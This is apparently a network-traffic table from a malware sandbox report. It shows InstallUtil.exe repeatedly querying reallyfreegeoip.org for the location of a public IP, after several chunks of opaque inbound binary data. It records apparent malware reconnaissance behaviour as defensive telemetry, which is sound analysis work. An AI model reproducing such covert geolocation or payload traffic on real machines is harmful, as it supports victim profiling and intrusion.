2024-10-25 19:27:01 UTC	16384	IN	Data Raw: f1 68 ef 34 8d 70 09 88 26 d3 ee 67 a0 b5 cf 79 91 27 41 51 01 f9 30 af 12 21 0f 75 74 d3 99 12 6e bc b3 ea ad 81 65 ab 1f 47 c8 ce 82 9e 6b bb c9 51 ea be 11 70 95 4e 65 94 c8 e5 20 7b ed 27 c3 a9 b3 84 8b 79 02 8b 9f b0 01 ef f4 80 8b 11 cb 99 bc f8 6c a2 3e 44 72 c5 f3 d7 16 22 6a b4 0f ad db ef 4e 93 e8 5d bb 37 dc bf 5b 4c e2 a5 83 27 85 c8 b5 09 bd 47 23 61 4f bb fc 2e 77 6a c1 dc 6f bb 46 b7 1d 31 fd 07 3b 31 f7 3f 8a 0a ac cf 29 d1 de 4d 55 8a 84 35 99 57 47 e0 97 13 76 3a 15 bb 93 26 55 d4 33 c8 43 f7 92 0f 1b cc 8b 33 85 ee 15 e0 0f 2b 79 45 aa f0 7d 6d b3 77 fd 18 05 64 02 2b 0b 34 2f 46 b8 7a 9e 8c 55 73 77 76 55 05 a6 8f c6 d2 20 61 cc ba 28 c4 85 09 ba e2 36 b4 70 be 59 70 47 35 bf 0b e4 26 13 e6 bf e7 8a 02 5c 1a e6 27 42 7d 8e 1e d5 48 6b Data Ascii: h4p&gy'AQ0!utneGkQpNe {'yl>Dr"jN]7[L'G#aO.wjoF1;1?)MU5WGv:&U3C3+yE}mwd+4/FzUswvU a(6pYpG5&\'B}Hk
2024-10-25 19:27:01 UTC	16384	IN	Data Raw: ae 2f 14 44 10 98 6b 6b db 6c b7 f8 f8 a0 18 2a 9e 2e c6 84 2b 21 ed 54 cb e4 e8 8e c8 59 59 b8 a9 73 a7 08 26 02 8d da f7 c2 98 85 1c e4 1f 13 47 4a a2 04 a5 3a af 51 7d 94 27 04 c6 20 8e c7 5b 4c 63 2e b7 2f 6c 4b ca 5c 7d f3 b8 e8 8e 2e 8c 84 e7 3b 01 5b 41 37 e2 81 88 10 14 b3 9c 22 e5 b7 d7 27 cc e0 3b 64 38 8d df 2a d4 dc 5c 68 5d 9a d6 a7 68 59 25 be 8a 7c a7 f8 c4 81 43 08 26 84 22 26 00 28 9a 16 52 89 85 b4 19 dd e6 f0 fc 4e 47 fb 19 61 f4 79 57 b5 53 61 38 24 40 98 71 5a a9 f5 cd 3b 9c a2 eb d1 12 bf 10 4c f0 1b 86 fb c7 a7 c8 75 5a 40 1d 17 84 26 86 b3 6a a5 77 62 4c a0 28 91 35 ab 04 8f 13 df 53 d5 b2 fa 2f a6 4d 0d 3c 70 3a 5e 6b b2 33 98 4a a6 c2 61 8a 11 83 89 8f 0b a3 74 95 68 71 08 87 10 95 14 14 d8 56 01 6d 21 0b 29 09 ca 8a 45 3c 90 49 Data Ascii: /Dkkl.+!TYYs&GJ:Q}' [Lc./lK\}.;[A7"';d8\h]hY%\|C&"&(RNGayWSa8$@qZ;LuZ@&jwbL(5S/M<p:^k3JathqVm!)E<I
2024-10-25 19:27:01 UTC	16384	IN	Data Raw: 7d 09 45 35 39 ca 88 b2 88 6d c5 76 e1 1e 08 51 99 1f ca a6 3d 6b 09 b6 97 b1 15 78 40 ac 35 60 72 d4 88 ff 20 85 35 9a f1 90 b8 72 69 43 e6 9a f9 e9 bc 79 20 91 89 5d e6 d7 de 9b cc e3 83 e5 91 6e 10 d9 75 c1 3b eb c1 02 2a 70 d1 33 11 8a e2 cb e3 42 90 8d cc a0 48 a5 62 50 73 ca 14 84 8b 03 a0 24 09 5b 2d 6c 7b 8c d7 4c a3 b0 5b 21 ed 48 6e 6f ee 63 93 36 a9 c4 b9 44 f2 9d 0e d5 33 42 34 18 58 c4 fa 4a 1b e5 1f 96 7c eb 2b 70 ec 09 e4 4f c0 55 fd b4 84 f4 f0 e0 de 14 e5 04 53 36 2f bf 5a 7f 6c 4e b2 aa 3b 74 c6 76 20 af cf dc 87 29 54 f5 ae 76 91 ea 7d d4 a6 7c 47 b2 24 a2 a0 65 b0 0c f7 0c d1 d0 9e 33 e3 58 f4 62 3f a6 9c a1 3e 47 83 47 2e dd 0e 00 88 f1 4a 2a 89 eb 52 da 12 f0 05 bf f5 90 19 ce 53 36 a9 ab a7 2e d0 d3 b8 be 6b 21 3e c0 65 ae bb 82 29 Data Ascii: }E59mvQ=kx@5`r 5riCy ]nu;p3BHbPs$[-l{L[!Hnoc6D3B4XJ\|+pOUS6/ZlN;tv )Tv}\|G$e3Xb?>GG.JRS6.k!>e)
2024-10-25 19:27:01 UTC	16384	IN	Data Raw: b0 17 a3 ed 7b 82 37 f6 53 21 32 2a d5 2f 39 7f 97 c8 48 20 f6 90 d8 4b d4 e6 6a 54 89 dd 3f cd a4 7d c1 e1 4e 03 00 9a ae 60 dc c4 3b 96 af f0 83 4f ef 7d c9 0f b5 fe 5c 82 c8 97 c6 88 56 fb a9 7c 7d 24 45 0b 16 8c b5 53 62 75 07 d8 6d e9 64 b9 65 fd 15 e9 fa 18 41 60 a5 01 d0 d1 2a 47 51 1f 16 69 87 52 1d 09 5d 9d 05 9e f1 8f ba 02 74 23 b4 0b d2 11 5a 7b 37 38 de 53 5e 3c d6 f8 76 e5 5a 6b 15 a7 b2 be 26 56 47 d6 be 24 46 97 f5 78 62 86 3b 8e 32 c5 5a 20 03 25 35 2f cc 6c 41 18 c5 8b 0a c3 de 33 ff 1f a5 f8 f7 ad f8 a4 ff 91 56 99 52 df af 7a 8a a4 e0 cd 4e bf e1 30 5e 06 7e 4e f3 e3 07 85 57 db e6 ea bf 22 e6 07 0d a3 19 38 56 01 04 d2 2c 80 47 42 01 0d f6 f9 1e fb ef fd 36 5f a2 09 1a 81 db ea 9a a0 32 d7 21 2b af 52 46 d3 bd 2d 01 65 0f bc a3 0b 83 Data Ascii: {7S!2/9H KjT?}N`;O}\V\|}$ESbumdeA`GQiR]t#Z{78S^<vZk&VG$Fxb;2Z %5/lA3VRzN0^~NW"8V,GB6_2!+RF-e

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49732	188.114.97.3	443	732	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-25 19:27:07 UTC	87	OUT	GET /xml/173.254.250.81 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-25 19:27:07 UTC	896	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 19:27:07 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 44103 Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jzq%2Bd1OFEi48ghTqLEXKT9NDrMZPagsOYgK6Qwz%2FaTnY8tX8qlY%2Fi8VFlldGK%2BSPpO90QROPXvJbO5zqKw5i8QnD0MJPwomOE3NoN5kpSEB6AtcDCyqGZegW8CC36vbM3S5r40jx"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d849a287d29a915-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1159&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2454237&cwnd=179&unsent_bytes=0&cid=3d366a5d5b1eb1d0&ts=306&x=0"
2024-10-25 19:27:07 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-25 19:27:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49733	188.114.97.3	443	732	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-25 19:27:08 UTC	63	OUT	GET /xml/173.254.250.81 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-25 19:27:08 UTC	888	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 19:27:08 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 44104 Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pVwRStNfl9i7mdCPwABXnmw6k31e6UJ1FEeEJ7Hyq9aP2AkQPX6fhTCVae1rex1vypeKNtztbOlTa7x0CwJoCrczSKKWepYjtaziKlVSAykc6ad36cbA8jkK7VB8FI91JlpJASyo"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d849a2e69ef0b95-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1272&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2369885&cwnd=236&unsent_bytes=0&cid=b05e4728769662d9&ts=165&x=0"
2024-10-25 19:27:08 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-25 19:27:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49735	188.114.97.3	443	732	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-25 19:27:09 UTC	87	OUT	GET /xml/173.254.250.81 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-25 19:27:10 UTC	894	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 19:27:10 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 44106 Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B9IyJRYrl51EM5T9mqcD4HLUUzEfpisFgXn51UwSc%2BRL0Br8an%2BL5eFz6RFPgLVUcraMV5oEKDgMLZquO570pHE3lyHpJi9jmamslvW7hPwIsTzu6TVtL7TZyotSf9tECX0AyPES"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d849a37ac671445-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1242&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2232845&cwnd=251&unsent_bytes=0&cid=7024025e4034e136&ts=168&x=0"
2024-10-25 19:27:10 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-25 19:27:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49737	188.114.97.3	443	732	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-25 19:27:11 UTC	87	OUT	GET /xml/173.254.250.81 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-25 19:27:11 UTC	896	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 19:27:11 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 44107 Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WeuGsesVNS5ME7MjW0%2BK5RvNuVSLT8xfN1nyjRhMGA5cZhYCJtXDgFROnNC%2FxylR1%2FbeQ2CIyY6mnyrrajjbhH5Ed%2FuDi2nGOLgzNP149bnjx7EBQfHQijnHIRF6LqP2cETqHDAK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d849a40fedb8d27-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1381&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2077474&cwnd=250&unsent_bytes=0&cid=00e8b0967d57249a&ts=155&x=0"
2024-10-25 19:27:11 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-25 19:27:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49739	188.114.97.3	443	732	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-25 19:27:12 UTC	63	OUT	GET /xml/173.254.250.81 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-25 19:27:13 UTC	904	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 19:27:12 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 44108 Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LmFeYg%2FWQYivsgh9ZaJa9t5VpXhlhjrL4%2FnNusOam%2Ba5%2B5EEWAMAm9TLxKW1hDPEtsRDTEAOxiiFxIAr%2F5Mg%2BP5suHLIueVa3tOAi5mwhiMc%2BfsvwBFb0aO7e1RJ%2B8ertk1E94tu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d849a49fbf4e9ca-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1389&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1980848&cwnd=249&unsent_bytes=0&cid=8fac5cadc2238662&ts=199&x=0"
2024-10-25 19:27:13 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-25 19:27:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49741	188.114.97.3	443	732	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-25 19:27:14 UTC	63	OUT	GET /xml/173.254.250.81 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-25 19:27:14 UTC	892	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 19:27:14 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 44110 Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rF87ckXmcbi1SHfXNDfPLF0u6PJIQTDmOaHAmTJ63e8BtWeRMX2guUfrYvvyzigxfUtBSqoLvKighCYguslbe7I6GcUb22suT%2B%2FhNpWvC28zxtywFTrUsJAHPXUn9pImVcHR53Gh"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d849a533a833159-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1375&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2143597&cwnd=234&unsent_bytes=0&cid=d6f97c660e941b11&ts=162&x=0"
2024-10-25 19:27:14 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-25 19:27:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49743	188.114.97.3	443	732	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-25 19:27:15 UTC	87	OUT	GET /xml/173.254.250.81 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-25 19:27:15 UTC	894	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 19:27:15 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 44111 Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZofWcfhXCfGhhojWqvkAL2%2FwOhllg9TgCuJEaB4e%2FuuHYlZ1a7sft3gFztBS9utvrHhPSgelEnOUkNInIQXuNAZyum1tm27Zn02%2FpltZDGkwrOOwEtUNk4LgCZQYGJ2vgcPeCsqe"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d849a5c39902e1b-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1524&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2093998&cwnd=238&unsent_bytes=0&cid=11f129911f4af049&ts=158&x=0"
2024-10-25 19:27:15 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.81</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-25 19:27:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49747	188.114.97.3	443	732	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-25 19:27:17 UTC	87	OUT	GET /xml/173.254.250.81 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-25 19:27:18 UTC	898	IN	HTTP/1.1 200 OK Date: Fri, 25 Oct 2024 19:27:18 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 44114 Last-Modified: Fri, 25 Oct 2024 07:12:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZDZOPqwDFYkoXDifZTsANPsrtLCi%2F09KrEOxjlBI%2Bt1%2Fu9osPTi%2BZxN5s9LqaNIgmiaktIR8mi11to8F46sRM1NgdHXr9Asbjm1EtDO9flQNHDcVTDao0foaFcOJZZoFFj%2BofyN8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d849a69b9fd2d2b-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1125&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2289328&cwnd=251&unsent_bytes=0&cid=bba08f94d7b8c001&ts=171&x=0"
